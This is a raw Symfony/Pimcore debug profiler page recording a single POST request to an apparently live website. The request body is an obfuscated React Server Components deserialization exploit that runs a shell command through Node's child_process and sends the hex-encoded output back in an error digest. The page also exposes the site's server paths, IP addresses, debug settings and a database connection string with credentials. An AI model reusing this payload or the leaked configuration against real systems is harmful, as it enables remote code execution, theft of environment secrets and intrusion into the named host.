DefaultController :: defaultAction
Request
GET Parameters
No GET parameters
POST Parameters
| Key | Value |
|---|---|
| 0 | "{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\": \"$B0\"}", "_response": {"_prefix": "var rb = arguments[1]; (Promise.all([Function('return import(\\\"node:child_process\\\")')(), Function('return import(\\\"node:zlib\\\")')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { var cmd = global[String.fromCharCode(66,117,102,102,101,114)].from('656e76', 'hex').toString(); cp.exec(cmd, {timeout: 8000}, (e, out, err) => { if (e && !out) out = ''; var rh = global[String.fromCharCode(66,117,102,102,101,114)].from(out).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: rh })); }); }); })).catch(err => rb(err));", "_formData": {"get": "$1:constructor:constructor"}}}" |
| 1 | ""$@0"" |
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _controller | "App\Controller\DefaultController::defaultAction" |
| _editmode | false |
| _event_controller | App\Controller\DefaultController {#1768 #container: Symfony\Component\DependencyInjection\Argument\ServiceLocator {#1771 …} } |
| _locale | null |
| _pimcore_context | "default" |
| _pimcore_frontend_request | true |
| _route | "document_1" |
| _route_params | [ "_locale" => null ] |
| _stopwatch_token | "77a2b0" |
| contentDocument | Pimcore\Model\Document\Page {#1749 #dao: Pimcore\Model\Document\Page\Dao {#1724 …} #dependencies: null #__dataVersionTimestamp: 1689771086 #path: "/" #properties: [] #id: 1 #creationDate: 1689771086 #modificationDate: 1689771086 #versionCount: 0 #userOwner: 1 #locked: null #userModification: 1 #parentId: 0 #parent: null #_fulldump: false #dirtyFields: [] -activeDispatchingEvents: [] #fullPathCache: "/" #type: "page" #key: "" #index: 999999 #published: true #children: [] #siblings: [] #controller: "App\Controller\DefaultController::defaultAction" #template: "" #editables: null #versions: null #contentMainDocumentId: &2 null #contentMasterDocumentId: &2 null #supportsContentMain: true #missingRequiredEditable: null #staticGeneratorEnabled: null #staticGeneratorLifetime: null #inheritedEditables: [] #scheduledTasks: null #title: "" #description: "" #prettyUrl: null : null : 1689771086 : "/" : [] : 1 : 1689771086 : 1689771086 : 0 : 1 : null : 1 : 0 : null : false : [] : "/" : "page" : "" : 999999 : true : [] : [] : "App\Controller\DefaultController::defaultAction" : "" : null : null : null : null : true : null : null : null : [] : null : "" : "" : null } |
| routeDocument | Pimcore\Routing\DocumentRoute {#1737 -path: "/" -host: "" -schemes: [] -methods: [] -defaults: [ "_locale" => null "_controller" => "App\Controller\DefaultController::defaultAction" ] -requirements: [] -options: [ "compiler_class" => "Symfony\Component\Routing\RouteCompiler" "utf8" => true ] -condition: "" -compiled: Symfony\Component\Routing\CompiledRoute {#1747 …} #document: Pimcore\Model\Document\Page {#1749 #dao: Pimcore\Model\Document\Page\Dao {#1724 …} #dependencies: null #__dataVersionTimestamp: 1689771086 #path: "/" #properties: [] #id: 1 #creationDate: 1689771086 #modificationDate: 1689771086 #versionCount: 0 #userOwner: 1 #locked: null #userModification: 1 #parentId: 0 #parent: null #_fulldump: false #dirtyFields: [] -activeDispatchingEvents: [] #fullPathCache: "/" #type: "page" #key: "" #index: 999999 #published: true #children: [] #siblings: [] #controller: "App\Controller\DefaultController::defaultAction" #template: "" #editables: null #versions: null #contentMainDocumentId: &2 null #contentMasterDocumentId: &2 null #supportsContentMain: true #missingRequiredEditable: null #staticGeneratorEnabled: null #staticGeneratorLifetime: null #inheritedEditables: [] #scheduledTasks: null #title: "" #description: "" #prettyUrl: null : null : 1689771086 : "/" : [] : 1 : 1689771086 : 1689771086 : 0 : 1 : null : 1 : 0 : null : false : [] : "/" : "page" : "" : 999999 : true : [] : [] : "App\Controller\DefaultController::defaultAction" : "" : null : null : null : null : true : null : null : null : [] : null : "" : "" : null } } |
Request Headers
| Header | Value |
|---|---|
| accept | "*/*" |
| accept-encoding | "gzip, deflate" |
| connection | "close" |
| content-length | "983" |
| content-type | "multipart/form-data; boundary=------------------------bissa_cve_boundary" |
| host | "www.heba.dennisdittrich.de" |
| next-action | "x" |
| user-agent | "Python/3.13 aiohttp/3.14.1" |
| x-php-ob-level | "1" |
Request Content
Request content not available (it was retrieved as a resource).
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "private, must-revalidate" |
| content-language | "en" |
| content-type | "text/html; charset=UTF-8" |
| date | "Tue, 30 Jun 2026 04:22:22 GMT" |
| expires | "Tue, 01 Jan 1980 00:00:00 GMT" |
| pragma | "no-cache" |
| x-debug-token | "460c92" |
| x-powered-by | "pimcore" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| APP_ENV | "dev" |
| PIMCORE_DEV_MODE | "false" |
| PIMCORE_TEST_DB_DSN | "mysql://pimcore:pimcore@test-db/pimcore" |
Defined as regular env variables
| Key | Value |
|---|---|
| CONTENT_LENGTH | "983" |
| CONTENT_TYPE | "multipart/form-data; boundary=------------------------bissa_cve_boundary" |
| CONTEXT_DOCUMENT_ROOT | "/var/www/heba.dennisdittrich.de/web/pim/public" |
| CONTEXT_PREFIX | "" |
| DOCTRINE_DEPRECATIONS | "trigger" |
| DOCUMENT_ROOT | "/var/www/heba.dennisdittrich.de/web/pim/public" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HTTPS | "on" |
| HTTP_ACCEPT | "*/*" |
| HTTP_ACCEPT_ENCODING | "gzip, deflate" |
| HTTP_CONNECTION | "close" |
| HTTP_HOST | "www.heba.dennisdittrich.de" |
| HTTP_NEXT_ACTION | "x" |
| HTTP_USER_AGENT | "Python/3.13 aiohttp/3.14.1" |
| PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" |
| PHPRC | "/var/www/conf/web26" |
| PHP_DOCUMENT_ROOT | "/var/www/clients/client5/web26" |
| PHP_FCGI_MAX_REQUESTS | "5000" |
| PHP_SELF | "/index.php" |
| PWD | "/var/www/php-fcgi-scripts/web26" |
| QUERY_STRING | "" |
| REDIRECT_HTTPS | "on" |
| REDIRECT_SCRIPT_URI | "https://www.heba.dennisdittrich.de/" |
| REDIRECT_SCRIPT_URL | "/" |
| REDIRECT_SSL_TLS_SNI | "www.heba.dennisdittrich.de" |
| REDIRECT_STATIC_PAGE_URI | "/%home" |
| REDIRECT_STATUS | "200" |
| REDIRECT_URL | "/" |
| REMOTE_ADDR | "144.172.97.178" |
| REMOTE_PORT | "38856" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1782793342 |
| REQUEST_TIME_FLOAT | 1782793342.1024 |
| REQUEST_URI | "/" |
| SCRIPT_FILENAME | "/var/www/heba.dennisdittrich.de/web/pim/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SCRIPT_URI | "https://www.heba.dennisdittrich.de/" |
| SCRIPT_URL | "/" |
| SERVER_ADDR | "23.88.1.98" |
| SERVER_ADMIN | "webmaster@heba.dennisdittrich.de" |
| SERVER_NAME | "www.heba.dennisdittrich.de" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SIGNATURE | "" |
| SERVER_SOFTWARE | "Apache" |
| SHELL_VERBOSITY | 3 |
| SHLVL | "0" |
| SSL_TLS_SNI | "www.heba.dennisdittrich.de" |
| STATIC_PAGE_URI | "/%home" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_DEBUG,PIMCORE_DEV_MODE,PIMCORE_TEST_DB_DSN" |
| TEMP | "/var/www/clients/client5/web26/tmp" |
| TMP | "/var/www/clients/client5/web26/tmp" |
| TMPDIR | "/var/www/clients/client5/web26/tmp" |